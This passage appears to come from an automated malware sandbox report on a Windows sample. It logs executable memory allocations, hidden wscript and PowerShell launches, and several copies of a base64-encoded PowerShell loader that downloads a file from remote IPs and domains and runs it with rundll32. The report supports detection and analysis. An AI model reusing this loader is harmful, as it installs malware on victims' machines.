NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a05000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a07000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a08000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a09000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 26, 2023, 10:20 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\ProgramData\diversityCourtby.js" isohelNoncumulatively Blackmailers storified thyrotomy filepath: wscript	1	1	0
ShellExecuteExW May 26, 2023, 10:20 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEI